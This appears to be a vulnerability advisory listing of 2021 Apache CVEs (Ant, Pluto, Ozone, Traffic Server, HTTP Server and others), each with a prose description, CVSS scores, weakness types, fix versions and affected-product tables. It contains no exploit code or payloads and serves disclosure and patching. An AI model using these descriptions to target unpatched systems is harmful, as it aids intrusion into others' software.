When reading a specially crafted ZIP archive, or a derived format, an Apache Ant build can be made to allocate large amounts of memory that leads to an out of memory error, even for small inputs. This can be used to disrupt builds using Apache Ant. Commonly used formats derived from ZIP archives are, for instance, JAR files and many office files. Apache Ant versions prior to 1.9.16 and 1.10.11 were affected.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H 1.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-130,NVD-CWE-Other,

Products Affected

Vendor Product Version
oracle retail_financial_integration 16.0.3.0
oracle communications_unified_inventory_management 7.4.2
oracle real-time_decision_server 3.2.0.0
oracle agile_engineering_data_management 6.2.1.0
oracle retail_eftlink 19.0.1
oracle communications_unified_inventory_management 7.4.0
oracle retail_financial_integration 15.0.4.0
oracle communications_cloud_native_core_automated_test_suite 1.9.0
oracle retail_bulk_data_integration 19.0.1
oracle utilities_framework 4.4.0.0.0
oracle retail_bulk_data_integration 16.0.3.0
oracle retail_eftlink 20.0.1
oracle retail_central_office 14.1
oracle primavera_gateway *
oracle retail_xstore_point_of_service 20.0.1
oracle banking_trade_finance 14.5
oracle retail_store_inventory_management 16.0
oracle agile_plm 9.3.6
oracle communications_unified_inventory_management 7.5.0
oracle primavera_unifier *
oracle utilities_framework 4.2.0.3.0
oracle retail_xstore_point_of_service 18.0.3
oracle retail_integration_bus 19.0.1.0
oracle retail_xstore_point_of_service 16.0.6
oracle retail_merchandising_system 19.0.1
oracle insurance_policy_administration *
oracle retail_advanced_inventory_planning 14.1
oracle primavera_unifier 18.8
oracle retail_xstore_point_of_service 17.0.4
oracle health_sciences_information_manager 3.0.0.1
oracle retail_back_office 14.0
oracle retail_point-of-service 14.0
oracle retail_invoice_matching 16.0.3
oracle banking_treasury_management 14.5
oracle retail_extract_transform_and_load 13.2.8
oracle retail_predictive_application_server 16.0.3.0
oracle retail_central_office 14.0
oracle primavera_unifier 19.12
oracle retail_advanced_inventory_planning 16.0
oracle retail_advanced_inventory_planning 15.0
oracle utilities_framework 4.2.0.2.0
oracle communications_order_and_service_management 7.3
oracle retail_store_inventory_management 14.1
oracle retail_back_office 14.1
oracle utilities_testing_accelerator 6.0.0.1.1
oracle utilities_framework 4.4.0.2.0
oracle retail_financial_integration 14.1.3.2
oracle retail_integration_bus 16.0.3.0
oracle enterprise_repository 11.1.1.7.0
oracle timesten_in-memory_database *
oracle financial_services_analytical_applications_infrastructure *
oracle communications_order_and_service_management 7.4
oracle communications_unified_inventory_management 7.3.0
apache ant *
oracle retail_integration_bus 14.1.3.2
oracle retail_service_backbone 16.0.3.0
oracle communications_unified_inventory_management 7.4.1
oracle retail_predictive_application_server 14.1.3
oracle utilities_framework *
oracle communications_diameter_intelligence_hub *
oracle retail_store_inventory_management 15.0
oracle product_lifecycle_analytics 3.6.1
oracle retail_service_backbone 15.0.4.0
oracle real-time_decision_server 11.1.1.9.0
oracle primavera_unifier 20.12
oracle retail_predictive_application_server 15.0.3
oracle health_sciences_information_manager *
oracle utilities_framework 4.4.0.3.0
oracle retail_xstore_point_of_service 19.0.2
oracle retail_integration_bus 15.0.4.0
oracle communications_cloud_native_core_binding_support_function 1.11.0
oracle retail_point-of-service 14.1
oracle retail_service_backbone 14.1.3.2
oracle retail_service_backbone 19.0.1.0
CVE-2021-36737 MEDIUM

The input fields of the Apache Pluto UrlTestPortlet are vulnerable to Cross-Site Scripting (XSS) attacks. Users should migrate to version 3.1.1 of the v3-demo-portlet.war artifact.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache pluto *
CVE-2021-36738 MEDIUM

The input fields in the JSP version of the Apache Pluto Applicant MVCBean CDI portlet are vulnerable to Cross-Site Scripting (XSS) attacks. Users should migrate to version 3.1.1 of the applicant-mvcbean-cdi-jsp-portlet.war artifact.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache pluto *
CVE-2021-36739 MEDIUM

The "first name" and "last name" fields of the Apache Pluto 3.1.0 MVCBean JSP portlet maven archetype are vulnerable to Cross-Site Scripting (XSS) attacks.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache pluto 3.1.0
CVE-2021-36749 MEDIUM

In the Druid ingestion system, the InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-863,

Products Affected

Vendor Product Version
apache druid *
CVE-2021-36774 MEDIUM

Apache Kylin allows users to read data from other database systems using JDBC. The MySQL JDBC driver supports certain properties, which, if left unmitigated, can allow an attacker to execute arbitrary code from a hacker-controlled malicious MySQL server within Kylin server processes. This issue affects Apache Kylin 2 version 2.6.6 and prior versions; Apache Kylin 3 version 3.1.2 and prior versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache kylin *
CVE-2021-37147 MEDIUM

Improper input validation vulnerability in header parsing of Apache Traffic Server allows an attacker to smuggle requests. This issue affects Apache Traffic Server 8.0.0 to 8.1.2 and 9.0.0 to 9.1.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,CWE-444,

Products Affected

Vendor Product Version
debian debian_linux 10.0
apache traffic_server *
debian debian_linux 11.0
CVE-2021-37148 MEDIUM

Improper input validation vulnerability in header parsing of Apache Traffic Server allows an attacker to smuggle requests. This issue affects Apache Traffic Server 8.0.0 to 8.1.2 and 9.0.0 to 9.0.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
debian debian_linux 10.0
apache traffic_server *
debian debian_linux 11.0
CVE-2021-37149 MEDIUM

Improper Input Validation vulnerability in header parsing of Apache Traffic Server allows an attacker to smuggle requests. This issue affects Apache Traffic Server 8.0.0 to 8.1.2 and 9.0.0 to 9.1.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
debian debian_linux 10.0
apache traffic_server *
debian debian_linux 11.0
CVE-2021-37150

Improper Input Validation vulnerability in header parsing of Apache Traffic Server allows an attacker to request secure resources. This issue affects Apache Traffic Server 8.0.0 to 9.1.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
fedoraproject fedora 35
fedoraproject fedora 36
debian debian_linux 10.0
apache traffic_server *
debian debian_linux 11.0
CVE-2021-37404 HIGH

There is a potential heap buffer overflow in Apache Hadoop libhdfs native code. Opening a user-provided file path without validation may result in a denial of service or arbitrary code execution. Users should upgrade to Apache Hadoop 2.10.2, 3.2.3, 3.3.2 or higher.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-787,

Products Affected

Vendor Product Version
apache hadoop *
CVE-2021-37533

Prior to Apache Commons Net 3.9.0, Net's FTP client trusts the host from the PASV response by default. A malicious server can redirect the Commons Net code to use a different host, but the user has to connect to the malicious server in the first place. This may lead to leakage of information about services running on the private network of the client. The default in version 3.9.0 is now false, ignoring such hosts, as cURL does. See https://issues.apache.org/jira/browse/NET-711.

Products Affected

Vendor Product Version
debian debian_linux 10.0
apache commons_net *
debian debian_linux 11.0
CVE-2021-37578 MEDIUM

Apache jUDDI uses several classes related to Java's Remote Method Invocation (RMI) which (as an extension to UDDI) provides an alternate transport for accessing UDDI services. RMI uses the default Java serialization mechanism to pass parameters in RMI invocations. A remote attacker can send a malicious serialized object to the above RMI entries. The objects get deserialized without any check on the incoming data. In the worst case, it may let the attacker run arbitrary code remotely. For both jUDDI web service applications and jUDDI clients, the usage of RMI is disabled by default. Since this is an optional feature and an extension to the UDDI protocol, the likelihood of impact is low. Starting with 3.3.10, all RMI related code was removed.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache juddi *
CVE-2021-37579 HIGH

The Dubbo Provider checks that the incoming request and the corresponding serialization type of this request meet the configuration set by the server. But there is an exception path that an attacker can use to skip the security check (when enabled) and reach a deserialization operation with native Java serialization. Apache Dubbo 2.7.13, 3.0.2 fixed this issue by failing quickly when any unrecognized request is found.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache dubbo *
CVE-2021-37580 HIGH

A flaw was found in Apache ShenYu Admin. The incorrect use of JWT in ShenyuAdminBootstrap allows an attacker to bypass authentication. This issue affected Apache ShenYu 2.3.0 and 2.4.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache shenyu 2.4.0
apache shenyu 2.3.0
CVE-2021-37608 HIGH

Unrestricted Upload of File with Dangerous Type vulnerability in Apache OFBiz allows an attacker to execute remote commands. This issue affects Apache OFBiz version 17.12.07 and prior versions. Upgrade to at least 17.12.08 or apply patches at https://issues.apache.org/jira/browse/OFBIZ-12297.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-434,

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2021-37839 MEDIUM

Apache Superset up to 1.5.1 allowed for authenticated users to access metadata information related to datasets they have no permission on. This metadata included the dataset name, columns and metrics.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-273,

Products Affected

Vendor Product Version
apache superset *
CVE-2021-38153 MEDIUM

Some components in Apache Kafka use `Arrays.equals` to validate a password or key, which is vulnerable to timing attacks that make brute force attacks for such credentials more likely to be successful. Users should upgrade to 2.8.1 or higher, or 3.0.0 or higher where this vulnerability has been fixed. The affected versions include Apache Kafka 2.0.0, 2.0.1, 2.1.0, 2.1.1, 2.2.0, 2.2.1, 2.2.2, 2.3.0, 2.3.1, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.6.0, 2.6.1, 2.6.2, 2.7.0, 2.7.1, and 2.8.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N 2.2 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-203,

Products Affected

Vendor Product Version
oracle primavera_unifier 20.12
oracle primavera_unifier 21.12
oracle financial_services_enterprise_case_management 8.0.7.1
oracle communications_brm_-_elastic_charging_engine *
oracle communications_brm_-_elastic_charging_engine 12.0.0.5.0
oracle financial_services_analytical_applications_infrastructure *
oracle primavera_unifier 18.8
oracle financial_services_behavior_detection_platform 8.1.2.0
oracle financial_services_enterprise_case_management 8.1.1.0
oracle financial_services_behavior_detection_platform *
quarkus quarkus *
oracle primavera_unifier 19.12
oracle financial_services_enterprise_case_management 8.0.8.1
oracle communications_cloud_native_core_policy 1.15.0
oracle financial_services_enterprise_case_management 8.0.8.0
apache kafka 2.8.0
oracle financial_services_behavior_detection_platform 8.1.1.1
oracle financial_services_enterprise_case_management 8.1.1.1
apache kafka *
oracle financial_services_behavior_detection_platform 8.1.1.0
oracle financial_services_enterprise_case_management 8.0.7.2
CVE-2021-38161 MEDIUM

Improper Authentication vulnerability in TLS origin verification of Apache Traffic Server allows for man in the middle attacks. This issue affects Apache Traffic Server 8.0.0 to 8.0.8.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.1 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H 2.2 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
debian debian_linux 10.0
apache traffic_server *
debian debian_linux 11.0
CVE-2021-38294 HIGH

A Command Injection vulnerability exists in the getTopologyHistory service of the Apache Storm 2.x prior to 2.2.1 and Apache Storm 1.x prior to 1.2.4. A specially crafted thrift request to the Nimbus server allows Remote Code Execution (RCE) prior to authentication.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-74,CWE-78,

Products Affected

Vendor Product Version
apache storm *
CVE-2021-38295 MEDIUM

In Apache CouchDB, a malicious user with permission to create documents in a database is able to attach an HTML attachment to a document. If a CouchDB admin opens that attachment in a browser, e.g. via the CouchDB admin interface Fauxton, any JavaScript code embedded in that HTML attachment will be executed within the security context of that admin. A similar route is available with the already deprecated _show and _list functionality. This privilege escalation vulnerability allows an attacker to add or remove data in any database or make configuration changes. This issue affected Apache CouchDB prior to 3.1.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.3 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H 1.3 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache couchdb *
CVE-2021-38296 MEDIUM

Apache Spark supports end-to-end encryption of RPC connections via "spark.authenticate" and "spark.network.crypto.enabled". In versions 3.1.2 and earlier, it uses a bespoke mutual authentication protocol that allows for full encryption key recovery. After an initial interactive attack, this would allow someone to decrypt plaintext traffic offline. Note that this does not affect security mechanisms controlled by "spark.authenticate.enableSaslEncryption", "spark.io.encryption.enabled", "spark.ssl", "spark.ui.strictTransportSecurity". Update to Apache Spark 3.1.3 or later.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-294,

Products Affected

Vendor Product Version
oracle financial_services_crime_and_compliance_management_studio 8.0.8.2.0
apache spark *
oracle financial_services_crime_and_compliance_management_studio 8.0.8.3.0
CVE-2021-38540 HIGH

The variable import endpoint was not protected by authentication in Airflow >=2.0.0, <2.1.3. This allowed unauthenticated users to hit that endpoint to add/modify Airflow variables used in DAGs, potentially resulting in a denial of service, information disclosure or remote code execution. This issue affects Apache Airflow >=2.0.0, <2.1.3.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-269,CWE-306,

Products Affected

Vendor Product Version
apache airflow *
CVE-2021-38542 MEDIUM

Apache James prior to release 3.6.1 is vulnerable to a buffering attack relying on the use of the STARTTLS command. This can result in man-in-the-middle command injection attacks, potentially leading to leakage of sensitive information.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N 2.2 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-77,CWE-327,

Products Affected

Vendor Product Version
apache james *
CVE-2021-38555 MEDIUM

An XML external entity (XXE) injection vulnerability was discovered in the Any23 StreamUtils.java file and is known to affect Any23 versions < 2.5. XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any back-end or external systems that the application itself can access.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 3.9 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache any23 *
CVE-2021-39231 MEDIUM

In Apache Ozone versions prior to 1.2.0, various internal server-to-server RPC endpoints are available for connections, making it possible for an attacker to download raw data from Datanode and Ozone Manager and modify Ratis replication configuration.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 3.9 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-862,

Products Affected

Vendor Product Version
apache ozone *
CVE-2021-39232 MEDIUM

In Apache Ozone versions prior to 1.2.0, certain admin related SCM commands can be executed by any authenticated users, not just by admins.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-862,

Products Affected

Vendor Product Version
apache ozone *
CVE-2021-39233 MEDIUM

In Apache Ozone versions prior to 1.2.0, container-related Datanode requests of Ozone Datanode were not properly authorized and can be called by any client.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 3.9 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-306,NVD-CWE-Other,

Products Affected

Vendor Product Version
apache ozone *
CVE-2021-39234 MEDIUM

In Apache Ozone versions prior to 1.2.0, authenticated users who know the ID of an existing block can craft a specific request allowing access to those blocks, bypassing other security checks such as ACLs.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.8 MEDIUM CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N 1.6 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,CWE-863,

Products Affected

Vendor Product Version
apache ozone *
CVE-2021-39235 MEDIUM

In Apache Ozone before 1.2.0, Ozone Datanode doesn't check the access mode parameter of the block token. Authenticated users with a valid READ block token can perform any write operation on the same block.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-732,

Products Affected

Vendor Product Version
apache ozone *
CVE-2021-39236 MEDIUM

In Apache Ozone before 1.2.0, authenticated users with valid Ozone S3 credentials can create specific OM requests, impersonating any other user.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-862,

Products Affected

Vendor Product Version
apache ozone *
CVE-2021-39239 MEDIUM

A vulnerability in XML processing in Apache Jena, in versions up to 4.1.0, may allow an attacker to execute XML External Entities (XXE), including exposing the contents of local files to a remote server.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache jena *
CVE-2021-39275 HIGH

ap_escape_quotes() may write beyond the end of a buffer when given malicious input. No included modules pass untrusted data to these functions, but third-party / external modules may. This issue affects Apache HTTP Server 2.4.48 and earlier.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-787,

Products Affected

Vendor Product Version
apache http_server *
siemens sinema_server 14.0
oracle http_server 12.2.1.3.0
oracle http_server 12.2.1.4.0
debian debian_linux 9.0
oracle instantis_enterprisetrack 17.1
debian debian_linux 10.0
siemens sinec_nms *
debian debian_linux 11.0
netapp clustered_data_ontap -
fedoraproject fedora 35
netapp cloud_backup -
fedoraproject fedora 34
oracle zfs_storage_appliance_kit 8.8
oracle instantis_enterprisetrack 17.2
oracle instantis_enterprisetrack 17.3
netapp storagegrid -
CVE-2021-40110 MEDIUM

In Apache James, using the Jazzer fuzzer, we identified that an IMAP user can craft IMAP LIST commands to orchestrate a Denial of Service using a vulnerable regular expression. This affected Apache James prior to 3.6.1. We recommend upgrading to Apache James 3.6.1 or higher, which enforces the use of the RE2J regular expression engine to execute regexes in linear time without back-tracking.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache james *
CVE-2021-40111 MEDIUM

In Apache James, while fuzzing the IMAP parsing stack with Jazzer, we discovered that crafted APPEND and STATUS IMAP commands could be used to trigger infinite loops resulting in expensive CPU computations and OutOfMemory exceptions. This can be used for a Denial of Service attack. The IMAP user needs to be authenticated to exploit this vulnerability. This affected Apache James prior to version 3.6.1. This vulnerability has been patched in Apache James 3.6.1 and higher. We recommend the upgrade.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-835,

Products Affected

Vendor Product Version
apache james *
CVE-2021-40146 HIGH

A Remote Code Execution (RCE) vulnerability was discovered in the Any23 YAMLExtractor.java file and is known to affect Any23 versions < 2.5. RCE vulnerabilities allow a malicious actor to execute any code of their choice on a remote machine over LAN, WAN, or internet. RCE belongs to the broader class of arbitrary code execution (ACE) vulnerabilities.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache any23 *
CVE-2021-40331

An Incorrect Permission Assignment for Critical Resource vulnerability was found in the Apache Ranger Hive Plugin. Any user with SELECT privilege on a database can alter the ownership of the table in Hive when Apache Ranger Hive Plugin is enabled. This issue affects Apache Ranger Hive Plugin: from 2.0.0 through 2.3.0. Users are recommended to upgrade to version 2.4.0 or later.

Products Affected

Vendor Product Version
apache ranger *
CVE-2021-40369 MEDIUM

A carefully crafted plugin link invocation could trigger an XSS vulnerability on Apache JSPWiki, related to the Denounce plugin, which could allow the attacker to execute JavaScript in the victim's browser and get some sensitive information about the victim. Apache JSPWiki users should upgrade to 2.11.0 or later.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache jspwiki *
CVE-2021-4040

A flaw was found in AMQ Broker. This issue can cause a partial interruption to the availability of AMQ Broker via an Out of memory (OOM) condition. This flaw allows an attacker to partially disrupt availability to the broker through a sustained attack of maliciously crafted messages. The highest threat from this vulnerability is system availability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L 3.9 1.4

Products Affected

Vendor Product Version
redhat amq_broker *
apache activemq_artemis *
CVE-2021-40438 MEDIUM

A crafted request uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user. This issue affects Apache HTTP Server 2.4.48 and earlier.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.0 CRITICAL CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H 2.2 6.0

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-918,

Products Affected

Vendor Product Version
redhat enterprise_linux_server_aus 7.2
siemens sinema_server 14.0
redhat enterprise_linux_update_services_for_sap_solutions 8.2
redhat enterprise_linux_server_aus 7.4
redhat enterprise_linux_eus 8.2
oracle http_server 12.2.1.4.0
redhat enterprise_linux_update_services_for_sap_solutions 8.1
redhat jboss_core_services 1.0
siemens sinema_remote_connect_server 3.2
oracle enterprise_manager_ops_center 12.4.0.0
redhat enterprise_linux_for_arm_64_eus 8.8
netapp clustered_data_ontap -
redhat enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions 8.1
redhat enterprise_linux_server_update_services_for_sap_solutions 7.6
redhat enterprise_linux_for_power_little_endian_eus 8.8
oracle zfs_storage_appliance_kit 8.8
oracle instantis_enterprisetrack 17.3
resf rocky_linux 8.0
redhat enterprise_linux_server_tus 8.6
broadcom brocade_fabric_operating_system_firmware -
redhat enterprise_linux_for_power_little_endian_eus 8.1
redhat enterprise_linux_server_tus 8.8
oracle http_server 12.2.1.3.0
redhat enterprise_linux_for_power_little_endian 8.0
debian debian_linux 9.0
redhat enterprise_linux 8.0
redhat enterprise_linux_eus 8.4
redhat enterprise_linux_for_power_big_endian 7.0
redhat enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions 8.4
redhat enterprise_linux_server_tus 7.7
redhat enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions 7.7
redhat enterprise_linux_for_power_little_endian_eus 8.2
redhat enterprise_linux_server 7.0
redhat enterprise_linux_for_power_little_endian 7.0
redhat enterprise_linux_server_update_services_for_sap_solutions 7.7
apache http_server *
redhat enterprise_linux_for_ibm_z_systems_eus_s390x 8.2
redhat enterprise_linux_server_tus 7.6
redhat enterprise_linux_for_power_little_endian_eus 8.4
oracle instantis_enterprisetrack 17.1
redhat enterprise_linux_update_services_for_sap_solutions 8.6
redhat enterprise_linux_eus 8.8
redhat enterprise_linux_for_ibm_z_systems_eus 8.8
debian debian_linux 10.0
oracle secure_global_desktop 5.6
redhat enterprise_linux_update_services_for_sap_solutions 8.4
fedoraproject fedora 35
netapp cloud_backup -
redhat enterprise_linux_server_tus 8.4
redhat enterprise_linux_for_scientific_computing 7.0
fedoraproject fedora 34
redhat enterprise_linux_for_ibm_z_systems_eus 8.1
redhat enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions 8.2
redhat enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions 8.6
redhat enterprise_linux_server_aus 7.6
redhat enterprise_linux_for_ibm_z_systems 8.0
redhat enterprise_linux_workstation 7.0
netapp storagegrid -
redhat enterprise_linux_for_ibm_z_systems_eus 8.4
redhat enterprise_linux_server_aus 7.3
redhat enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions 8.8
siemens sinema_remote_connect_server *
redhat enterprise_linux_server_aus 8.6
redhat enterprise_linux_update_services_for_sap_solutions 8.8
siemens sinec_nms *
redhat enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions 7.6
siemens ruggedcom_nms *
f5 f5os *
redhat enterprise_linux_eus 8.6
